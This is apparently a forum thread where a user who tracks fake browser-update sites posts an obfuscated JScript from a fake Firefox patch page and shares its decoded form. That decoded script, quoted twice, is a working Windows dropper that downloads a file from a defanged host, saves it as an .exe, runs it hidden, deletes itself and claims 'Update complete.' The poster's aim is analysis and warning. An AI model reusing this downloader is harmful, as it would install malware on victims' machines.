Does that mean someone is trying to hack into people's computers by asking them to download free browsers?
Wow, there is a real need for caution nowadays.
Topic: Can somebody decypher this? (Read 497 times)
In case anybody is interested, I posted it on another site and somebody cracked it.
http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/
The decyphered script, with XXXXX added from the above gibberish is
http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/
The decyphered script, with XXXXX added from the above gibberish is
Quote
try {
a = new ActiveXObject("Wscript.Shell");
b = new ActiveXObject("Scripting.FileSystemObject");
c = new ActiveXObject("MSXML2.XMLHTTP");
d = new ActiveXObject("ADODB.Stream");
url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
for (var i = 1; i <= 5; i++) {
try {
c.open("GET", url, false);
c.send(null);
break;
} catch (e) {
WScript.Sleep(5000);
}
}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position = 0;
if (b.Fileexists(fname)) b.DeleteFile(fname);
d.SaveToFile(fname);
a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
var p = WScript.ScriptFullName;
if (b.FileExists(p)) b.DeleteFile(p);
WScript.Echo("Update complete.");
} catch (e) {}
a = new ActiveXObject("Wscript.Shell");
b = new ActiveXObject("Scripting.FileSystemObject");
c = new ActiveXObject("MSXML2.XMLHTTP");
d = new ActiveXObject("ADODB.Stream");
url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
for (var i = 1; i <= 5; i++) {
try {
c.open("GET", url, false);
c.send(null);
break;
} catch (e) {
WScript.Sleep(5000);
}
}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position = 0;
if (b.Fileexists(fname)) b.DeleteFile(fname);
d.SaveToFile(fname);
a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
var p = WScript.ScriptFullName;
if (b.FileExists(p)) b.DeleteFile(p);
WScript.Echo("Update complete.");
} catch (e) {}
There are a lot of fake browser update sites. Usually I download the scrypt and go to the url and forward the malicious stuff to virustotal to see how long various antivirus sites take to detect it. This scrypt though is written in gibberish that doesn't seem to have a url.
All the ZZZZZs are added to break links
It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink
The script is as follows, can you decypher it? Warning it has something malicious that no antivirus detects yet.
The symbol [ is replaced by ZZZZZ
var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m
Right now it scores 0/54 on virustotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/
In a few days it will score 5 or 10 / 54
In a week or two 20 or 30 / 54
All the ZZZZZs are added to break links
It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink
The script is as follows, can you decypher it? Warning it has something malicious that no antivirus detects yet.
The symbol [ is replaced by ZZZZZ
var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m
Right now it scores 0/54 on virustotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/
In a few days it will score 5 or 10 / 54
In a week or two 20 or 30 / 54
Jump to: